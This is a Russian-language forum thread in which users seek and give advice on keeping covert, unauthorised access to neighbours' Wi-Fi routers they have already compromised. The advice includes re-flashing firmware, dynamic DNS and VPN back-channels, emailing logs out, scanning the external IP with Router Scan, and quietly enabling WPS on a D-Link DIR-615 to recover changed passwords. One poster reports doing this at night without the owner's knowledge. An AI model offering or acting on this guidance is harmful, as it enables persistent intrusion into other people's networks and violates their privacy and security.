Linksach, у тебя есть полный доступ!!! В чем проблема? Прошивка происходит 270с-460с с сохраненными настройками , можно прошить, вопрос только зачем? настроить vpn server?
Linksach
23.11.2015, 21:41
Linksach, у тебя есть полный доступ!!! В чем проблема? Прошивка происходит 270с-460с с сохраненными настройками , можно прошить, вопрос только зачем? настроить vpn server?
Чтоб RS мог находить данный роутер и выдавать необходимую инфу по нему в случае того когда человек например сменит пароль и пин-код одновременно или перейдёт на шифрование WPA и тоже всё поменяет .ЧТОБ НЕ БЫЛО ПРОБЛЕМ С ПОЛУЧЕНИЕМ НУЖНОЙ МНЕ ИНФЫ по данному роутеру.Думаю лишняя уязвимость не помешает про запас.Тем более что у меня инет от него с хорошим-отличным сигналом.И не так много доступных сетей с хорошим сигналом .Всё на будущее!на будущее!и на расчёт что об этой уязвимости человек догадается в последнюю очередь чем поменять пароль и пин
Linksach
23.11.2015, 22:10
Linksach, у тебя есть полный доступ!!! В чем проблема? Прошивка происходит 270с-460с с сохраненными настройками , можно прошить, вопрос только зачем? настроить vpn server?
Плохо конечно если провайдер выдаёт ip динамический тому роутеру тогда ничего не получится у меня ,RS НЕ БУДЕТ ОТОБРАЖАТЬ роутер всегда ,щас не могу глянуть роутер не в сети.
после
Глянул-динамический ip .Теперь конечно не стоит прошивать раз ip будет всё время менятся тогда это всё бесстолку
Triton_Mgn
25.11.2015, 01:04
ну а серьёзно?что ж наблюдать
У Вас есть сотрудники, ну хо
Плохо конечно если провайдер выдаёт ip динамический тому роутеру тогда ничего не получится у меня ,RS НЕ БУДЕТ ОТОБРАЖАТЬ роутер всегда ,щас не могу глянуть роутер не в сети.
после
Глянул-динамический ip .Теперь конечно не стоит прошивать раз ip будет всё время менятся тогда это всё бесстолку
Ну почему же бестолку, поднимите VPN / и если он в Вашей локальной сети - будет отдавать интернет.
Testeron
25.11.2015, 01:28
Глянул-динамический ip
Так подними DyDNS бесплатный и будешь знать его IP .
P.S. ну или настрой на почту отправку лог файлов (ну там сам знаешь чего)
larsenn95
26.11.2015, 05:04
помогите нубику
итак имеем: взломанную точку вафай доступ к веб морде роутера доступ к настройкам роутера по воздуху то есть физического доступа нет-оно и понятно точка то соседская) wps отключен
требуется: полазить в настройках и сделать так чтоб если даже сосед поменяет пароль я смог бы подключиться модель роутера dir-615 прошивка 1.0.13 пожалуйста научите бедолагу лучше пошаговый мануал
заранее спасибо
помогите нубику
итак имеем: взломанную точку вафай доступ к веб морде роутера доступ к настройкам роутера по воздуху то есть физического доступа нет-оно и понятно точка то соседская) wps отключен
требуется: полазить в настройках и сделать так чтоб если даже сосед поменяет пароль я смог бы подключиться модель роутера dir-615 прошивка 1.0.13 пожалуйста научите бедолагу лучше пошаговый мануал
заранее спасибо
1. Переписать себе внешний IP, который от провайдера. Он точно не поменяется. Потом попробовать Router Scan по этому адресу его пробить. Если не сменят логин пароль вход на админку, то Router Scan подберет. А если сменят, точно не знаю влючен ли dir-615 в базу Router Scan по уязвимостям. Если включен, то тоже всё получится.
2. Включить wps и записать себе пин. По пину пороль определится сразу. Но это уже слишком нагло и не рекомендую делать!
binarymaster
26.11.2015, 17:31
Переписать себе внешний IP, который от провайдера. Он точно не поменяется.
Вот как раз не факт... даже внутренние IP адреса бывают динамическими.
Включить wps и записать себе пин. По пину пороль определится сразу. Но это уже слишком нагло и не рекомендую делать!
Не вижу здесь особой наглости. Включение доступа на роутер извне - куда более наглое действо ИМХО.
Вот как раз не факт... даже внутренние IP адреса бывают динамическими.
Не вижу здесь особой наглости. Включение доступа на роутер извне - куда более наглое действо ИМХО.
Но диапазон у провайдера ведь есть?
wps светится в сети на точке. И владелец это может заметить, если он его преднамеренно отключал.
binarymaster
26.11.2015, 20:53
Но диапазон у провайдера ведь есть?
Конечно есть, но зачастую их несколько.
wps светится в сети на точке. И владелец это может заметить, если он его преднамеренно отключал.
Стандартные Wi-Fi клиенты на Windows, Ubuntu (WICD Network Manager), и Android никак не помечают WPS-активные сети - они могут оповестить лишь при первичном подключении. Для определения WPS используют дополнительное ПО, те, кому это необходимо.
Да и большинство простых пользователей даже не догадываются.
larsenn95
27.11.2015, 01:27
Конечно есть, но зачастую их несколько.
Стандартные Wi-Fi клиенты на Windows, Ubuntu (WICD Network Manager), и Android никак не помечают WPS-активные сети - они могут оповестить лишь при первичном подключении. Для определения WPS используют дополнительное ПО, те, кому это необходимо.
Да и большинство простых пользователей даже не догадываются.
ваши вы слова да богу в уши))) а по факту сделал так зашел в настроки роутера поздней ночью и включил режим впс перписал на всякий случай пин по умолчанию по ходу мой сосед оказался простым пользователем будем посмотреть что дальше будеит(сколько повисим на этой точке) все откликнувщимся спасибо огромное за просвещение в некоторых вопросах
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot